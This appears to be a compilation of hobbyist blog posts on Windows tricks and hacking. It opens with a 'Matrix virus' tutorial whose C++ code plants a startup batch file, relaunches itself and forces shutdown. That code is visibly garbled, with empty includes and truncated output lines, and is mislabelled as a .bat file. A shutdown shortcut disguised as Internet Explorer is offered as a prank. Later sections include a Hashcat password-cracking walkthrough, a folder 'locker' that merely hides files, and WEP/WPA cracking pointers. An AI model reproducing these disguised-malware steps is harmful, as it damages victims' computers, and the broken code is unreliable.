Matrix Virus

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::




Warning - Do not run it on your computer


I'm gonna teach you how to make a virus named Matrix...


1- Open notepad
2- Put in this code


#include
#include
#include
#include
#include
#include
#include
using namespace std;


int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);


{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}


{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}


START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;






3- Save it as matrix.bat
4- Finish






AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN


AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO, AND STUFF LIKE THAT

ShutDown Virus and its Cure

Shut Down Virus::::


1. Right click on the Desktop


2. Click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next


Note: This "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...


3. U will get another dialogue box, write in it: Internet Explorer and press finish


4. U will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the Internet explorer and the press apply then ok
try to open it, it is a virus :D :D :D




PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Make your PC faster than before

Wanna fasten Your PC..?? Follow these steps:-

# Go to start then click run and then type regedit


# Select HKEY_CURRENT_USER and then select control panel folder and then select desktop folder. Do it correctly


# You will see registry setting at your right hand side, after that select menu show delay and then right click and select modify.


# you will find edit string option -----> default value data is 400 , you have to change the value Data to 000


# Restart your computer. You will notice that your computer has become much more faster.

Hard Reset for NOKIA cell phones

Hard Reset for Symbian S60 3rd, 5th (Touch Screen & QWERTY)


S60 3rd Hard Reset:
1- Turn the device off
2- Press and hold “*” “3” and call Green keys
3- Turn on the device by pressing the on button
4- Wait till the nokia logo appear


S60 5th Hard Reset(Touch Screen):
1- Turn the device off
2- Press and hold “Answer” “Reject” and Camera keys
3- Turn on the device by pressing the on button
4- Wait till the nokia logo appear


S60 5th Hard Reset(Qwerty):
1- Turn the device off
2- Press and hold “shift” “space” and Back space keys
3- Turn on the device by pressing the on button
4- Wait till the nokia logo appear

To Convert a FAT Partition to NTFS without Formatting

To convert a FAT partition to NTFS, perform the following steps: 


1) Open 'Command Prompt'. 


2) At the command prompt, type the following- 


CONVERT [driveletter]: /FS:NTFS.


'Convert.exe' will attempt to convert the partition to NTFS.




NOTE :- Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command.

The RUN Command List

‎100+ Run commands List

• Accessibility Options : access.cpl
• Add Hardware : hdwwiz.cpl
• Add / Remove Programs : appwiz.cpl
• Administrative Tools : control admintools
• Automatic Updates : wuaucpl.cpl
• Wizard file transfer Bluethooth : fsquirt
• Calculator : calc
• Certificate Manager : certmgr.msc
• Character : charmap
• Checking disk : chkdsk
• Manager of the album (clipboard) : clipbrd
• Command Prompt : cmd
• Service components (DCOM) : dcomcnfg
• Computer Management : compmgmt.msc
• DDE active sharing : ddeshare
• Device Manager : devmgmt.msc
• DirectX Control Panel (if installed) : directx.cpl
• DirectX Diagnostic Utility : dxdiag
• Disk Cleanup : cleanmgr
• System Information : dxdiag
• Disk Defragmenter : dfrg.msc
• Disk Management : diskmgmt.msc
• Partition manager : diskpart
• Display Properties : control desktop
• Properties of the display (2) : desk.cpl
• Properties display (tab "appearance") : control color
• Dr. Watson : drwtsn32
• Manager vérirficateur drivers : check
• Event Viewer : Eventvwr.msc
• Verification of signatures of files : sigverif
• Findfast (if present) : findfast.cpl
• Folder Options : control folders
• Fonts (fonts) : control fonts
• Fonts folder windows : fonts
• Free Cell : freecell
• Game Controllers : Joy.cpl
• Group Policy (XP Pro) : gpedit.msc
• Hearts (card game) : mshearts
• IExpress (file generator. Cab) : IExpress
• Indexing Service (if not disabled) : ciadv.msc
• Internet Properties : inetcpl.cpl
• IPConfig (display configuration) : ipconfig / all
• IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
• IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
• IPConfig (IP configuration cancels maps) : ipconfig / release
• IPConfig (renew IP configuration maps) : ipconfig / renew
• Java Control Panel (if present) : jpicpl32.cpl
• Java Control Panel (if present) : javaws
• Keyboard Properties : control keyboard
• Local Security Settings : secpol.msc
• Local Users and Groups : lusrmgr.msc
• Logout : logoff
• Microsoft Chat : winchat
• Minesweeper (game) : winmine
• Properties of the mouse : control mouse
• Properties of the mouse (2) : main.cpl
• Network Connections : control NetConnect
• Network Connections (2) : ncpa.cpl
• Network configuration wizard : netsetup.cpl
• Notepad : notepad
• NView Desktop Manager (if installed) : nvtuicpl.cpl
• Manager links : packager
• Data Source Administrator ODBC : odbccp32.cpl
• Screen Keyboard : OSK
• AC3 Filter (if installed) : ac3filter.cpl
• Password manager (if present) : Password.cpl
• Monitor performance : perfmon.msc
• Monitor performance (2) : perfmon
• Dialing Properties (phone) : telephon.cpl
• Power Options : powercfg.cpl
• Printers and Faxes : control printers
• Private Character Editor : eudcedit
• Quicktime (if installed) : QuickTime.cpl
• Regional and Language Options : intl.cpl
• Editor of the registry : regedit
• Remote desktop connection : mstsc
• Removable Storage : ntmsmgr.msc
• requests the operator to removable storage : ntmsoprq.msc
• RSoP (traduction. ..) (XP Pro) : rsop.msc
• Scanners and Cameras : sticpl.cpl
• Scheduled Tasks : control schedtasks
• Security Center : wscui.cpl
• Console management services : services.msc
• shared folders : fsmgmt.msc
• Turn off windows : shutdown
• Sounds and Audio Devices : mmsys.cpl
• Spider (card game) : spider
• Client Network Utility SQL server : cliconfg
• System Configuration Editor : sysedit
• System Configuration Utility : msconfig
• System File Checker (SFC =) (Scan Now) : sfc / scannow
• SFC (Scan next startup) : sfc / scanonce
• SFC (Scan each démarraget) : sfc / scanboot
• SFC (back to default settings) : sfc / revert
• SFC (purge cache files) : sfc / purgecache
• SFC (define size CAHC x) : sfc / cachesize = x
• System Properties : sysdm.cpl
• Task Manager : taskmgr
• Telnet client : telnet
• User Accounts : nusrmgr.cpl
• Utility Manager (Magnifier, etc) : utilman
• Windows firewall (XP SP2) : firewall.cpl
• Microsoft Magnifier : magnify
• Windows Management Infrastructure : wmimgmt.msc
• Protection of the accounts database : syskey
• Windows update : wupdmgr
• Introducing Windows XP (if not erased) : tourstart
• Wordpad : write
• Date and Time Properties : timedate.cpl

DriverPack Solution 11

Having trouble in installing the drivers for your personal computer or laptop...??

Try DriverPack Solutions.DriverPack Solution is the most popular program for automated driver installation. It has a lot of new features and is optimized for all platforms (x32-x64). The program will install drivers on any computer...!

The main features are as under.

1. Fast installation of Windows drivers

        DriverPack Solution is the most popular program for automated drivers installation. DriverPack Solution has more than 9,000,000 users all over the world.

2. Any driver for any computer in one program

        DriverPack Solution simplifies the process of reinstalling Windows on any computer. No more problems of searching and installing drivers. Everything will be done in couple of mouse clicks.

3. Free distribution

        DriverPack Solution is open source software and it’s distributed freely under the GNU GPL license. This means everyone can customize the program making it even better!

Download it Here...!!!

Create and hack Secured Folders

Securing Confidential Data is a basic requirement of everyone. This can also be done through available Softwares on Internet. Now i will share a method to Lock folders Without using any Software.This Trick will work in windows XP,Vista and Windows 7.

Why to Use this Method?

*. If you are afraid of getting Viruses through Softwares(This Technique is completely Safe ).

*. If you are using PC of someone else and want to do some prankand not having enough time to download and install Softwares.

*. If for some reason you are not able to Install Softwares on PC.

How to do it?

*. Open Notepad ( Start->Run->Notepad)

*. Copy the Code below and Paste it into Notepad .

cls

:End

@ECHO OFF

title Folder Locker

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER

:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%==cyberspirit goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Locker

echo Locker created successfully

goto End

*. Password for the above batch file is set to cyberspirit . You can change it to anything by editing cyberspirit to your choice in following line:

if NOT %pass%== cyberspirit  goto FAIL

*. Now Save this file with a name anyname.bat (here .bat is the extension). I am choosing cyberspirit.bat as my file name in this tutorial.

*. Now a Bat file is created.

*. Now double click on bat file and it will ask you for password and Enter Password (for the above code it is cyberspirit).

*. Now you will see a folder named LOCKER in the same location where you saved anyname.bat (cyberspirit.bat here) file.

*. Open it and fill it with the data you wanna hide.

*. When you are done with the above press Y in the bat file and hit Enter.

*. Now Close this Bat file window and locker folder will hide itself.

*. Again to Edit Locker Folder double click cyberspirit.bat file and enter password .

You can do it as many times as you want. :)

Hashcode cracking using Hashcat in Backtrack 4

I have Break The security(BTS) readers, this is first Backtrack 4 hacking tutorial.  Today let us see about the HashCat cracking tool(Dictionary attack).

Backtrack 4 Tutorials Step 1:

Boot into the Backtrack 4 Linux.  

Now Navigate to this Path:

Backtrack->privilege Escalation->Password attack->Offline attacks

Open the HashCat .

Now you can see the terminal window with this path :

root@bt:/pentest/passwords/hashcat#

Hashcat Basic option and commands

Step 2:
If you scroll to the top, you will find helpful commands.  The standard format to run the hashcat application is

./hashcat-cli.bin [options] hashfile [wordfiles|directories]

You can see the list of options below the command format. 
 Hash files is file which contains the hashcode(MD5 Hash code for instance).
worldfiles is dictionary file
List of optiions are:
Startup:

-V, --version print version
-h, --help print help
--eula print eula


Logging and Files:
-r, --rules-file=FILE rules-file for hybrid-attack
-o, --output-file=FILE output-file for recovered hashes
-e, --salt-file=FILE salts-file for unsalted hashlists
--debug-file=FILE debug-file
--debug-mode=NUM 0 = save finding rule (hybrid only)
1 = save original word (hybrid only)
2 = save recovered pass
-p, --seperator-char=CHAR seperator-char for hashlists


Resources:


-n, --threads=NUM number of threads
-c, --segment-size=NUM number of mb to cache from wordfile
-s, --words-skip=NUM skip number of words (for resume)
-l, --words-limit=NUM limit number of words (for distributed)


Attacks:
-g, --generate-rules=NUM number of self-generating rules
--generate-rules-func-min=NUM force number of functions per rule min
--generate-rules-func-max=NUM force number of functions per rule max
-a, --attack-mode=NUM number of attack-mode
0 = Straight *
1 = Combination *
2 = Toggle-Case *
3 = Brute-Force
4 = Permutation
* = for Hybrid-Attack use -r or -g


-m, --hash-mode=NUM number of hash-mode


0 = MD5 200 = MySQL
1 = md5($pass.$salt) 300 = MySQL4.1/MySQL5
2 = md5($salt.$pass) 400 = MD5(Wordpress)
3 = md5(md5($pass)) 400 = MD5(phpBB3)
4 = md5(md5(md5($pass))) 500 = MD5(Unix)
5 = md5(md5($pass).$salt) 600 = SHA-1(Base64)
6 = md5(md5($salt).$pass) 700 = SSHA-1(Base64)
7 = md5($salt.md5($pass)) 800 = SHA-1(Django)
8 = md5($salt.$pass.$salt) 900 = MD4
9 = md5(md5($salt).md5($pass)) 1000 = NTLM
10 = md5(md5($pass).md5($salt)) 1100 = Domain Cached Credentials
11 = md5($salt.md5($salt.$pass)) 1200 = MD5(Chap)
12 = md5($salt.md5($pass.$salt)) 1300 = MSSQL
30 = md5($username.0.$pass)
31 = md5(strtoupper(md5($pass)))
100 = SHA1
101 = sha1($pass.$salt)
102 = sha1($salt.$pass)
103 = sha1(sha1($pass))
104 = sha1(sha1(sha1($pass)))
105 = sha1(strtolower($username).$pass)


Toggle-Case specific:
--toggle-min=NUM number of alphas in plain minimum
--toggle-max=NUM number of alphas in plain maximum


Brute-Force specific:
--bf-pw-min=NUM password length minimum
--bf-pw-max=NUM password length maximum
--bf-cs-buf=CHARS charset for attack


Permutation specific:
--perm-min=NUM number of chars in plain minimum
--perm-max=NUM number of chars in plain maximum

 Step 3: 
Copy the dictionary file and hashcode file to desktop.
I have this MD5 hashcode (c3ea886e7d47f5c49a7d092fadf0c03b) inside the hash.txt file.
My dictionary file is english.txt



Step 4:
now type this command:

/hashcat-cli.bin '/root/hash.txt' '/root/english.txt'

and hit enter now hashcode will be cracked.
NOTE:
If you are running the Hashcat for first time,then you will get this 
"EULA has changed,need to restart the hashcat".
Just close the window and open the hashcat, then run the above command.  

Eula changed restart the hashcat

After restarting asking for the License Aggrement

Hashcode will be cracked when you enter YES

Step 5:

if you can not crack with above method itself,then proceed with this.
You can enhance the cracking by using options.
HashMode Option: 
Using Hashmode we can specify which type of Hash code we are going to crack.
 How to use Hashmode option?
 '-m[value]' is to specify the hashmode method.
Refer the above list of option to know the different values of hashmode.
We are going to crack MD5 Hashcode,right? for md5 ,value is 0.
So use this command:

/hashcat-cli.bin  -m0  '/root/hash.txt'    '/root/english.txt'

Enhancing with Attack Mode(-a[value]):

Using attack mode,we can specify how the password can be.  I think you may not understand what i am saying.  So i will explain the attack mode with example.
ok lets take the simple key "iloveyou" from english.txt.
Values of Attack Mode are:
             0 = Straight
             1 = Combination
             2 = Toggle-Case 
             3 = Brute-Force
             4 = Permutation
if we use -a0 option,then key will as it is " iloveyou".  for -a1,it will be "iloveyouiloveyou". for -a2 ,it will be IloveYou,ILoveyou..etc.  I think you know about brute force,if you don't know please read my previous post about bruteforce.  I hope you know about permutation.

/hashcat-cli.bin  -m0 -a2 '/root/hash.txt'    '/root/english.txt'

Installing and Configuring Backtrack on ur PC

FYI : An excellent guide about Backtrack4 can be found at BackTrack 4 – The Definitive Guide

1. Installing Backtrack to a harddrive (using Ubiquity)

• Boot from the Backtrack DVD and choose “Start Backtrack in Text Mode”
• Backtrack will boot and will automatically end up at a root prompt.
• Launch the GUI by running ‘startx’.
• Open a konsole and run ‘ubiquity’.
• At the “Language crashed” dialog, choose “Continue anyway’”
• Set timezone and choose keyboard layout.
• Let backtrack partition the disk. (‘Use entire disk’)
• Enter new user account information. (Pick a strong password, as this will be the user account used to log on into Backtrack)
• Review the installation summary and press “install” to start the installation.
• Reboot when installation has completed
• Log in with the newly created user
• change the password for root (sudo passwd root)

Installing VirtualBox guest additions (if you have installed BT on VirtualBox) :

• In Virtualbox, select “Devices – Install Guest Additions”)
• open Konsole, mount cdrom (“mount cdrom”) and run “sudo /media/cdrom/VBoxLinuxAdditions-x86.run”
• reboot (“sudo reboot”)

2. Running Backtrack from USB (with support for persistent changes)

This procedure only works for Backtrack 4 Pre-final. You need a 4Gb (or bigger) USB stick to run BT4 Pre-Final.

• Boot Backtrack and insert the USB. In my test environment, I’m running BT on VirtualBox. Let’s say the USB was detected as sda (run ‘dmesg’ to see system messages after you have connected the USB) .
  
• Mount the Backtrack CDRom
  • mount /dev/cdrom /media/cdrom
• Run fdisk :
  • fdisk /dev/sda
    • Verify that there are no partitions :  ‘p’   (or use  ‘d’ to remove any existing partitions, ‘w’ to write the changes, and run fdisk again)
    • create a new partion : ‘n’
      • p   (primary)
      • Partition number 1
      • First cilinder : use default 1
      • Last cylinder : +1500M
    • create another new partition : ‘n’
      • p    (primary)
      • Partition number 2
      • First cilinder : use default value
      • Last cylinder : +1500M
    • Set first partition active and set partition type of first partition to FAT32
      • a
        • 1
      • t
        • 1
        • b
      • Look at the partition table now. There should be 2 partitions of each 1,5G
        
      • write the changes to disk : ‘w’
• Format the 2 partitions :

  mkfs.vfat -F 32 -n BT4 /dev/sda1
  mkfs.ext3 -b 4096 -L casper-rw /dev/sda2

  Use the default journal size (8192 blocks)
• Mount the USB key and copy the file structure from the CDRom to USB stick

  mkdir /mnt/sda1
  mount /dev/sda1 /mnt/sda1
  rsync -avh /media/cdrom/ /mnt/sda1/        

  (don’t forget the backslashes after ‘cdrom’ and after ‘sda1’ !)
• When all files are copied (1,32Gbytes, may take a little while) , run grub-install

  grub-install --no-floppy --root-directory=/mnt/sda1 /dev/sda1

  
• Edit boot menu

  vi /mnt/sda1/boot/grub/menu.lst

  Set ‘default’ to 5
  Find the entry with title “Start Persistent Live CD”. Change the title to for example “Start Persistent Live USB”.
  Edit the line below the title (“kernel” line) and add the following statement at the end of the line :
  vga=0×317
  Save the changes
• Unmount the USB key

  cd /
  umount /mnt/sda1

• Boot a computer from this newly created USB and verify that BT works, and that changes are written onto the USB. 

Alternatively, you can create a USB based BT from Windows by using UNetbootin (Windows).
Partition the USB drive (as explained above), run UNetbootin, select the BT4 Pre-final ISO file, select the USB drive and install.
After the installation, find syslinux.cfg in the root of the first partition on the USB.  Edit the file and add the vga=0×317 parameter after “Start Persistent Live CD” (under label ubnentry4)
At the top of the file, set default to ubnentry4. Save the file and you’re all set

3. Networking and Network Services
Networking
By default, DHCP (or networking for that matter) is disabled. You need to run ‘/etc/init.d/networking start’ to start networking. If you want to load networking at boot (on a HD install or USB with persistent changes), add that command into /etc/init.d/rc.local or run “sudo /usr/sbin/update-rc.d networking defaults”
Wireless networking can be started with Knetworkmanager (run “sudo /etc/init.d/NetworkManager”)
SSH
Edit ssh config and disable root logon via ssh :
sudo vi /etc/ssh/sshd_config  and set “PermitRootLogin” to no.
If you get an error about the ssh_host_dsa_key or ssh_host_rsa_key not being found, generate the keys and try again
Starting OpenBSD Secure Shell server: sshd
Could not load host key: /etc/ssh/ssh_host_dsa_key
Could not load host key: /etc/ssh/ssh_host_rsa_key
Generate host keys :

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

Start sshd (“sudo /etc/init.d/ssh start”)
If you want to enable ssh to start at boot time, run update-rc.d ssh defaults

4. Keeping Backtrack up-to-date

Updating & Upgrading Backtrack

/usr/bin/apt-get -y update
/usr/bin/apt-get -y upgrade

To download and install all new updates, run apt­-get dist-­upgrade
The first time you run the apt-get update, you may get an error “GPG error : http://ppa.launchpad.net intrpid Release: The following signatures couln’t be verified because the public key…”
Quick fix :

wget http://apt.pearsoncomputing.net/public.gpg
sudo apt-key add public.gpg
rm public.gpg

(Then run the apt-get update again and it should work)
Upgrading the distro to the lastest version :

apt-get update && apt-get dist-upgrade -y

Warning : an “upgrade”  in BT4Beta will also upgrade KDE to 3.5.. If KDE is not working anymore after update/upgrade  ?  (a.k.a. ‘startx’ does not seem to work) :

root@bt:~# cd /etc/alternatives/
root@bt:/etc/alternatives# mv x-session-manager x-session-manager-broken
root@bt:/etc/alternatives# ln -s /opt/kde3/bin/startkde x-session-manager
root@bt:/etc/alternatives# startx

(this issue should be fixed in the final version)

 Updating security components

/pentest/exploits/fast-track.py -i

First update fast-track, then update other individual components (Metasploit, Aircrack, nikto, etc; or choose ‘9’ to update all)
If updating nikto doesn’t work :

Updating Nikto...
cd: 1: can't cd to /pentest/scanners/nikto/
/bin/sh: ./nikto.pl: not found 

Fix :

root@bt:~# mkdir /pentest/scanners/nikto/
root@bt:~# ln -s /usr/bin/nikto /pentest/scanners/nikto/nikto.pl
root@bt:/pentest/exploits/~# ./fast-track -c 1 2

5. Change keyboard layout

dpkg-reconfigure console-setup

6. Installing Nessus
First, download the Nessus and NessusClient installation packages from the Nessus (Tenable Network Security) website : http://www.nessus.org/download/
(Choose ‘Nessus for Linux’) and download the packages for Ubuntu. Put the .deb files in /tmp
Install Nessus Daemon

root@bt4-1:/tmp# ls Nessus* -al
-rw-r--r-- 1 root root 3002846 Jul  4 15:46 Nessus-4.0.1-ubuntu810_i386.deb
-rw-r--r-- 1 root root  500624 Jul  4 15:46 NessusClient-4.0.1-ubuntu810_i386.deb
root@bt4-1:/tmp#
root@bt4-1:/tmp# dpkg --install Nessus-4.0.1-ubuntu810_i386.deb
Selecting previously deselected package nessus.
(Reading database ... 183074 files and directories currently installed.)
Unpacking nessus (from Nessus-4.0.1-ubuntu810_i386.deb) ...
Setting up nessus (4.0.1) ...
nessusd (Nessus) 4.0.1. for Linux
(C) 1998 - 2009 Tenable Network Security, Inc.

 - Please run /opt/nessus/sbin/nessus-adduser to add a user
 - Register your Nessus scanner at http://www.nessus.org/register/ to obtain
   all the newest plugins
 - You can start nessusd by typing /etc/init.d/nessusd start

root@bt4-1:/tmp# 

Install Nessus Client
Before installing the client, you will need to install some dependencies :

root@bt4-1:/tmp# apt-get install libqt4-core libqt4-gui
      libqtcore4 libqt4-network libqt4-script libqt4-xml
      libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl
      libqt4-designer libqt4-assistant

Reading package lists... Done
Building dependency tree
Reading state information... Done
libqtcore4 is already the newest version.
libqtcore4 set to manually installed.
libqt4-network is already the newest version.
libqt4-network set to manually installed.
libqt4-script is already the newest version.
libqt4-script set to manually installed.
libqt4-xml is already the newest version.
libqt4-xml set to manually installed.
libqt4-dbus is already the newest version.
libqt4-dbus set to manually installed.
libqt4-test is already the newest version.
libqt4-test set to manually installed.
libqtgui4 is already the newest version.
libqtgui4 set to manually installed.
libqt4-svg is already the newest version.
libqt4-svg set to manually installed.
libqt4-designer is already the newest version.
libqt4-designer set to manually installed.
libqt4-assistant is already the newest version.
libqt4-assistant set to manually installed.
The following NEW packages will be installed:
  libqt4-core libqt4-gui libqt4-opengl
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 176kB of archives.
After this operation, 762kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/main libqt4-core 4.4.3-0ubuntu1.2 [7562B]
Get:2 http://archive.offensive-security.com pwnsauce/main libqt4-opengl 4.4.3-0ubuntu1.2 [161kB]
Get:3 http://archive.offensive-security.com pwnsauce/main libqt4-gui 4.4.3-0ubuntu1.2 [7554B]
Fetched 176kB in 1s (114kB/s)
debconf: apt-extracttemplates failed: Bad file descriptor
Selecting previously deselected package libqt4-core.
(Reading database ... 183131 files and directories currently installed.)
Unpacking libqt4-core (from .../libqt4-core_4.4.3-0ubuntu1.2_i386.deb) ...
Selecting previously deselected package libqt4-opengl.
Unpacking libqt4-opengl (from .../libqt4-opengl_4.4.3-0ubuntu1.2_i386.deb) ...
Selecting previously deselected package libqt4-gui.
Unpacking libqt4-gui (from .../libqt4-gui_4.4.3-0ubuntu1.2_i386.deb) ...
Setting up libqt4-core (4.4.3-0ubuntu1.2) ...
Setting up libqt4-opengl (4.4.3-0ubuntu1.2) ...

Setting up libqt4-gui (4.4.3-0ubuntu1.2) ...
Processing triggers for libc6 ...
ldconfig deferred processing now taking place

Now you can install the client :

root@bt4-1:/tmp# dpkg --install NessusClient-4.0.1-ubuntu810_i386.deb
Selecting previously deselected package nessusclient.
(Reading database ... 183150 files and directories currently installed.)
Unpacking nessusclient (from NessusClient-4.0.1-ubuntu810_i386.deb) ...
Setting up nessusclient (4.0.1) ...

Create Certificate

root@bt4-1:/tmp# /opt/nessus/sbin/nessus-mkcert
-------------------------------------------------------------------------------
                        Creation of the Nessus SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL
certificate of Nessus. Note that this information will *NOT* be sent to
anybody (everything stays local), but anyone with the ability to connect to your
Nessus daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]: BE
Your state or province name [none]: WVL
Your location (e.g. town) [Paris]: Deerlijk
Your organization [Nessus Users United]: Corelan

Congratulations. Your server certificate was properly created.

The following files were created :

. Certification authority :

   Certificate = /opt/nessus//com/nessus/CA/cacert.pem
   Private key = /opt/nessus//var/nessus/CA/cakey.pem

. Nessus Server :
    Certificate = /opt/nessus//com/nessus/CA/servercert.pem
    Private key = /opt/nessus//var/nessus/CA/serverkey.pem
root@bt4-1:/tmp# 

Create a Nessus user:

root@bt4-1:/tmp# /opt/nessus/sbin/nessus-adduser
Login : MyGreatNessusAdminUser
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that peter has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Aborted by end-user.

Register/update plugins
Get yourself a key that will provide access to the free home update feed  : Register a HomeFeed
You will receive an email that contains the feed code.
Install/Register the code with the following command (and update the plugins at the same time) :

root@bt4-1:/tmp# /opt/nessus/bin/nessus-fetch --register PUT-YOUR-CODE-HERE
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

Verify that “auto_update” in /opt/nessus/etc/nessus/nessusd.conf is set according to the behaviour you want to achieve. If you want to manually update the plugins, you can run :

root@bt4-1:/tmp# /opt/nessus/sbin/nessus-update-plugins
Fetching the newest updates from nessus.org...
Done. The Nessus server will restart when its scans are finished

Make sure Nessus does not start at boot

root@bt4-1:/tmp# update-rc.d -f nessusd remove
 Removing any system startup links for /etc/init.d/nessusd ...
   /etc/rc0.d/K20nessusd
   /etc/rc1.d/K20nessusd
   /etc/rc2.d/S20nessusd
   /etc/rc3.d/S20nessusd
   /etc/rc4.d/S20nessusd
   /etc/rc5.d/S20nessusd
   /etc/rc6.d/K20nessusd

Launch Nessus daemon

root@bt4-1:/tmp# /etc/init.d/nessusd start
Starting Nessus : .
root@bt4-1:/tmp# 

Install additional plugins
http://www.alienvault.com/free_feed_for_nessus.php
Nessus/OpenVAS wrapper for ike-scan

7. Wireless auditing
Crack WEP : Cheatsheet – Cracking WEP with Backtrack 4 and aircrack-ng
Crack WPA2 PSK : Cheatsheet – Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
Wepbuster : Download from http://code.google.com/p/wepbuster/. Installation procedure (assuming that wepbuster was downloaded into /tmp) :

root@bt:/# cd /tmp
root@bt:/tmp# tar xvfz wepbuster.tgz
wepbuster-1.0_beta/
wepbuster-1.0_beta/README.TXT
wepbuster-1.0_beta/wepbuster
root@bt:/tmp# mv wepbuster-1.0_beta/wepbuster /usr/local/bin
root@bt:/tmp# 

Modify parameters :
edit wepbuster and change the $airodumpwait and $scan_duration parameters (and set them to a value higher than 20):

# Time to wait before reading the airodump output. 23 seconds/sleeps should be safe on default aircrack
-ng installation which updates ]
# .csv files every 20 seconds;
my $airodumpwait = 23 ;

# Initial airodump scan duration (sleeps) when trying to build target AP list
my $scan_duration = 23;

8. Installing/Running in VMWare, but KDE resolution is bad ?

Run “fixvmware”

9. Log on in KDE with root (dangerous ! But if you still want to do it…)

Edit /etc/kde3/kdm/kdmrc  and set the following parameters :

AllowRootLogin=true
AutoLoginEnable=true
AutoLoginUser=root
AutoLoginPass=secret 

Reboot


Enjoy!!!